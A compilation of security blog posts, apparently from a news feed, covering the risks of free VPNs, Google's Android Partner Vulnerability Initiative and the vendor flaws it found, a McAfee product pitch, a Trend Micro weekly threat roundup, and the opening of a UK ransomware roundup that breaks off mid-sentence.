Using free VPN is like a tunnel with tons of holes that can leak your data or IP address. Hackers can track your activity, prying eyes can monitor you, and worse can expose you to tons of privacy threats. 

  1. They Are Not Safe

Free VPN solutions are risky. They are a dangerous threat to your security and privacy. Running a VPN service is pricey and offering it for free to users is fishy. That means your data are the menu served for other people to devour. 

  1. Aggressive Ads

Free VPNs practice aggressive ads that can go over a hit where you land into a hazardous site. It can expose you to tons of threats and hackers that can instantly access your information and files. High volume ads can also weigh your system down and affect browsing experience aside from privacy threats. 

  1. Malware Exposure 

Free VPN solutions contain malware that can damage not just your privacy but your devices. You have higher chances to get exposed with these nasty bugs when you download such software. Mobile ransomware and malware can steal your sensitive information like social security details and bank login details. 

Conclusion

Free VPNs are enticing and offer ‘robust security’ without the need to pay for hundreds of dollars a year. However, your security is at stake, together with your sensitive data, and information. 

Though it can help you stream region-restricted websites, you need to reconsider options and potential threats. Free VPNs are not safe; if you want to secure your digital presence, you can opt for an affordable VPN solution that offers high-end encryption to ensure your privacy and data is protected against potential hacks.

The post 5 Reasons Why You Should Avoid Free VPNs appeared first on CyberDB.

Announcing the launch of the Android Partner Vulnerability Initiative

Posted by Kylie McRoberts, Program Manager and Alec Guertin, Security Engineer

Android graphic

Google’s Android Security & Privacy team has launched the Android Partner Vulnerability Initiative (APVI) to manage security issues specific to Android OEMs. The APVI is designed to drive remediation and provide transparency to users about issues we have discovered at Google that affect device models shipped by Android partners.

Another layer of security

Android incorporates industry-leading security features and every day we work with developers and device implementers to keep the Android platform and ecosystem safe. As part of that effort, we have a range of existing programs to enable security researchers to report security issues they have found. For example, you can report vulnerabilities in Android code via the Android Security Rewards Program (ASR), and vulnerabilities in popular third-party Android apps through the Google Play Security Rewards Program. Google releases ASR reports in Android Open Source Project (AOSP) based code through the Android Security Bulletins (ASB). These reports are issues that could impact all Android based devices. All Android partners must adopt ASB changes in order to declare the current month’s Android security patch level (SPL). But until recently, we didn’t have a clear way to process Google-discovered security issues outside of AOSP code that are unique to a much smaller set of specific Android OEMs. The APVI aims to close this gap, adding another layer of security for this targeted set of Android OEMs.

Improving Android OEM device security

The APVI covers Google-discovered issues that could potentially affect the security posture of an Android device or its user and is aligned to ISO/IEC 29147:2018 Information technology -- Security techniques -- Vulnerability disclosure recommendations. The initiative covers a wide range of issues impacting device code that is not serviced or maintained by Google (these are handled by the Android Security Bulletins).

Protecting Android users

The APVI has already processed a number of security issues, improving user protection against permissions bypasses, execution of code in the kernel, credential leaks and generation of unencrypted backups. Below are a few examples of what we’ve found, the impact and OEM remediation efforts.

Permission Bypass

In some versions of a third-party pre-installed over-the-air (OTA) update solution, a custom system service in the Android framework exposed privileged APIs directly to the OTA app. The service ran as the system user and did not require any permissions to access, instead checking for knowledge of a hardcoded password. The operations available varied across versions, but always allowed access to sensitive APIs, such as silently installing/uninstalling APKs, enabling/disabling apps and granting app permissions. This service appeared in the code base for many device builds across many OEMs, however it wasn’t always registered or exposed to apps. We’ve worked with impacted OEMs to make them aware of this security issue and provided guidance on how to remove or disable the affected code.

Credential Leak

A popular web browser pre-installed on many devices included a built-in password manager for sites visited by the user. The interface for this feature was exposed to WebView through JavaScript loaded in the context of each web page. A malicious site could have accessed the full contents of the user’s credential store. The credentials are encrypted at rest, but used a weak algorithm (DES) and a known, hardcoded key. This issue was reported to the developer and updates for the app were issued to users.

Overly-Privileged Apps

The checkUidPermission method in the PackageManagerService class was modified in the framework code for some devices to allow special permissions access to some apps. In one version, the method granted apps with the shared user ID com.google.uid.shared any permission they requested and apps signed with the same key as the com.google.android.gsf package any permission in their manifest. Another version of the modification allowed apps matching a list of package names and signatures to pass runtime permission checks even if the permission was not in their manifest. These issues have been fixed by the OEMs.

More information

Keep an eye out at https://bugs.chromium.org/p/apvi/ for future disclosures of Google-discovered security issues under this program, or find more information there on issues that have already been disclosed.

Acknowledgements: Scott Roberts, Shailesh Saini and Łukasz Siewierski, Android Security and Privacy Team

Convenience vs. Online Security: Have Your Cake and Eat It Too

online safety

Convenience vs. Online Security: Have Your Cake and Eat It Too

We live in a world where convenience is king. Personally, I don’t know what I would do without my calendar alerts popping up on my smartphone, ensuring that I don’t miss any important meetings (or birthdays).  I can also use a variety of apps to make appointments with my family’s doctor and check up on my kids’ educational progress while they are at home distance learning. While this technology is great and convenient, it has led to increased connectivity which tends to cause security implications. At what point do we draw the line between convenience and online security, and is there a way to ultimately have both? Let’s take a look.

Are Consumers Confident in Their Online Safety?

Consumers want to live their lives fast. They are constantly on the go, prioritizing speedy technology and convenience – sometimes more than safety. As a result, basic security hygiene, like updating passwords, has fallen by the wayside. In fact, a recent survey conducted by YouGov in April of 2020 revealed that consumers are overconfident in the level of protection that their credentials provide. 77% believe that their banking credentials are the most secure, followed by online shopping (74%), and work network logins (71%). Due to consumers’ overconfidence in the strength of their credentials, over half of online shoppers admitted that they have no plans to update their login details – and even more admitted to not updating bank and work passwords. As someone who just recently wrote a blog on common password habits and how they can affect our online safety,

Finding a Balance Between Convenience and Security

As today’s users are trying to grasp what the “new normal” means for them and how they live their lives, many are branching out from the typical ways they used to order food, take workout classes, and more. Consumers are using food delivery sites that they’ve never used before and signing up for online fitness classes on new platforms to  stay healthy while social distancing. But by using these unfamiliar websites to establish a sense of normalcy, users might forget to take basic security precautions like making sure these websites have the standard https:// security clearance or using a VPN. Paying attention to these security measures while exploring new platforms will allow users to enjoy the convenience of these tools without putting their online safety at risk.

According to McAfee Labs, more than 113,000 websites have been published that used COVID-19 to lure internet users into giving up their personal details. But despite the risks associated with poor security hygiene, consumers appear to be pretty indifferent. When asked if COVID-19 and increased fraud influenced them to use alternative banking or shopping apps/websites with more secure options, over three-quarters of U.S. consumers stated no, or that they didn’t know. At the onset of the pandemic when consumers were under pressure to buy scarce, staple items, 26% of consumers in the U.S. admitted to overlooking online security concerns by using third-party merchants to buy things like toilet paper and disinfecting products.

Today’s users already have so much to worry about – I can’t blame them if their online security is falling by the wayside to allow physical health and wellness to take precedent. It’s times like these when people need to prioritize their health and basic survival above all else that consumers benefit most from intrinsic security that is constantly working in the background, so they can have peace of mind.

Let Them Have Security (and Convenience!)

The good news: convenience and security don’t have to be mutually exclusive. I can still use my healthcare provider’s app to schedule appointments and check in on my kids as they distance learn without risking our family’s privacy. When it comes to balancing convenience and online security, you and your family should use trusted solutions that will allow you to enjoy all that the internet has to offer  by providing security that is easy, convenient, and empowers you to enjoy a safe and private digital live.

Users can enjoy a comprehensive, yet holistic approach to protection by employing the help of a security solution like McAfee® Total Protection. Consumers are safeguarded from malware  so they can continue to use their devices and web browsing to stream live workout classes, catch up with family over video conference, and more. The software’s detection capabilities are constantly being updated and enhanced without compromising users’ device performance.

McAfee Total Protection also includes McAfee® WebAdvisor – web protection that enables users to sidestep attacks before they happen with clear warnings of risky websites, links, and files. McAfee WebAdvisor allows consumers to online shop or order food from their favorite restaurant while giving them the peace of mind that they’re on a safe website.

McAfee Total Protection also includes our secure VPN to ensure your family is prepared for potential threats that could be lurking around the corner. By enabling a VPN on your device, you can feel confident that the next time you bank or pay bills online, your connection is secure. With solutions like McAfee Total Protection and McAfee WebAdvisor in place, consumers can strike a balance between convenience and security, without sacrificing either.

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

The post Convenience vs. Online Security: Have Your Cake and Eat It Too appeared first on McAfee Blogs.

This Week in Security News: Linkury Adware Caught Distributing Full-Blown Malware and Cross-Platform Modular Glupteba Malware Uses ManageX

week in security

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about how an adware family known primarily for distributing browser hijackers, Linkury, has been caught distributing malware. Also, read about a newly uncovered strain of the Glupteba trojan.

 

Read on:

Cross-Platform Modular Glupteba Malware Uses ManageX

Trend Micro recently encountered a variant of the Glupteba trojan and reported its attacks on MikroTik routers and updates on its command and control (C&C) servers. The use of ManageX, a type of modular adware that Trend Micro has recently analyzed, is notable in this newly uncovered strain as it aims to emphasize the modularity and the cross-platform features of Glupteba as seen through its code analysis.

Phishing Attack Targets Microsoft 365 Users with Netflix & Amazon Lures

Security researchers have been tracking a phishing campaign that abuses Microsoft Office 365 third-party application access to obtain specific resources from victims’ accounts. The attacker, dubbed TA2552, mostly uses Spanish-language lures and a narrow range of themes and brands. These attacks have targeted organizations with a global presence but seem to choose victims who likely speak Spanish, according to a report from Proofpoint researchers.

New Report Suggests the Bug Bounty Business is Recession-Proof

A new report from HackerOne presents data suggesting that the bug bounty business might be recession-proof, citing increases in hacker registrations, monthly vulnerability disclosures and payouts during a pandemic-induced economic downturn. Brian Gorenc, senior director of vulnerability research and director of Trend Micro’s Zero Day Initiative program, shared that he’s seen bug bounty activity increase with ZDI publishing 1,045 vulnerability advisories in all of 2019 and 1,235 already in 2020.

Identity Fraud: How to Protect Your Identity Data, Accounts and Money During the Coronavirus Crisis

We’ve all been spending more time online since the pandemic hit, and as a result we’re sharing more personal and financial information online with each other and with organizations. Unfortunately, as ever, there are bad guys around every digital corner looking for this. Personally identifiable information (PII) is the currency of internet crime, and cyber-criminals will do whatever they can to get it.

Linkury Adware Caught Distributing Full-Blown Malware

An adware family known primarily for distributing browser hijackers has been caught distributing malware, security researchers said at the Virus Bulletin 2020 security conference. Its main method of distribution is the SafeFinder widget, a browser extension ironically advertised as a way to perform safe searches on the internet. K7 researchers say that in recent cases they analyzed, the SafeFinder widget has now also begun installing legitimate malware, such as the Socelars and Kpot infostealer trojans.

Chinese APT Group Targets Media, Finance, and Electronics Sectors

Cybersecurity researchers have uncovered a new espionage campaign targeting media, construction, engineering, electronics, and finance sectors in Japan, Taiwan, the U.S. and China. Linking the attacks to Palmerworm (aka BlackTech), likely a China-based advanced persistent threat (APT), the first wave of activity associated with this campaign began last year in August 2019.

InterPlanetary Storm Botnet Infects 13K Mac, Android Devices

A new variant of the InterPlanetary Storm malware has been discovered, which comes with fresh detection-evasion tactics and now targets Mac and Android devices (in addition to Windows and Linux, which were targeted by previous variants of the malware). Researchers say the malware is building a botnet with a current estimated 13,500 infected machines across 84 countries worldwide – and that number continues to grow.

More Americans Share Social Security, Financial and Medical Information than Before the Pandemic

A new survey has shown that consumer willingness to share more sensitive data – social security numbers, financial information and medical information – is greater in 2020 than in both 2018 and 2019. According to the NYC-based scientific research foundation ARF’s (Advertising Research Foundation) third annual privacy study, contact tracing is considered a key weapon in the fight against COVID-19.

Do you feel like you are more willing to share sensitive information online since the pandemic began? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Linkury Adware Caught Distributing Full-Blown Malware and Cross-Platform Modular Glupteba Malware Uses ManageX appeared first on .

Cyber Security Roundup for October 2020

A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, September 2020.

COVID-19 wasn't the only virus seriously disrupting the start of the new UK academic year, with ransomware plaguing a number of University and Colleges in September.  Newcastle University was reportedly hit by the 'DoppelPaymer' crime group, a group known for deploying malware to attack their victims, and behind leaking online documents from Elon Musk's SpaceX and Tesla companies. The northeast university reported a personal data breach to the UK Information Commissioner's Office after its stolen files were posted online, along with a Twitter threat to release further confidential student and staff data if a ransom payment was not paid. In a statement, the university said "it will take several weeks" to address the issues, and that many IT services will not be operating during this period", that statement is the hallmark of recovery from a mass ransomware infection.

Doppelpaymer Ransom notice

On the back of the Newcastle University cyberattack, the UK National Cyber Security Centre (NCSC) issued a warning to all British universities and colleges about a spike in ransomware attacks targeting the British educational sector. NCSC's director of operations Paul Chichester said the agency had seen an increase in the "utterly reprehensible" attacks over the past 18 months and was concerned they would disrupt young people's education.  The NCSC's guidance for organisations on defending against ransomware attacks